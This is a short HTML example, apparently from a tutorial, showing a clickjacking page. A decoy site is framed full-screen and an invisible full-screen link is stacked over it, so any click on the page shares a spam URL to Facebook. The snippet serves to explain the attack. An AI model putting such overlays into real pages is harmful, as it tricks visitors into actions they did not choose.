An iFramed Website Used To Hijack A Click
<html>
<head>
<style>
body {
position: relative;
margin: 0;
}
iframe, div, a {
border: none;
position: absolute;
width: 100%;
height: 100%;
}
div {
z-index: 100;
}
a {
display: block;
}
</style>
</head>
<body>
<iframe src="www.kittens.com/vacuum-revenge">
</iframe>
<div>
<a href="https://www.facebook.com/sharer/sharer.php?u=hot-felines-in-your-area.com">
</div>
</body>
</html>